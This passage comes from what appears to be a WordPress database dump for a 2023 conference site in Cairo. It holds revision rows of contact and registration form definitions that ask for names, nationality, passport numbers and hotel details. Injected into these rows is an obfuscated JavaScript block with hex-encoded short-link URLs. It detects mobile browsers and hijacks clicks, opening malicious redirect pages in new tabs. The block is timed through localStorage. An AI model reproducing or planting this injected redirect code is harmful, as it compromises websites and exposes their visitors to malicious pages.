x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:52:25','2023-08-20 22:52:25','',5345,'https://gsw2023.com/?p=5356',0,'revision','',0),
(5357,1,'2023-08-20 22:53:27','2023-08-20 22:53:27','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"Nationality\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"number\",\"label\":\"Passport No.\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"text\",\"label\":\"Hotel accommodation in Cairo\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Comment or Message\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":8,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:53:27','2023-08-20 22:53:27','',5345,'https://gsw2023.com/?p=5357',0,'revision','',0),
(5358,1,'2023-08-20 22:54:27','2023-08-20 22:54:27','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Which access pass would you like to purchase?\",\"choices\":{\"1\":{\"label\":\"Bronze - $199.95\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Silver - $299.95\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Gold - $399.95\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"checkbox\",\"label\":\"Which sessions do you plan on attending?\",\"choices\":{\"1\":{\"label\":\"Session 1\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"Session 2\",\"value\":\"\",\"image\":\"\"},\"3\":{\"label\":\"Session 3\",\"value\":\"\",\"image\":\"\"},\"4\":{\"label\":\"Session 4\",\"value\":\"\",\"image\":\"\"},\"5\":{\"label\":\"Session 5\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"radio\",\"label\":\"Will you be staying overnight?\",\"choices\":{\"1\":{\"label\":\"Yes\",\"value\":\"\",\"image\":\"\"},\"2\":{\"label\":\"No\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"required\":\"1\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\",\"choices\":{\"1\":{\"label\":\"I would like to receive email updates regarding future conferences\",\"value\":\"\",\"image\":\"\"}},\"description\":\"\",\"choices_images_style\":\"modern\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"textarea\",\"label\":\"Comments or Questions\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}},\"id\":\"3318\",\"field_id\":9,\"settings\":{\"form_title\":\"conference\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: conference\",\"sender_name\":\"Gsw2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"2\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you 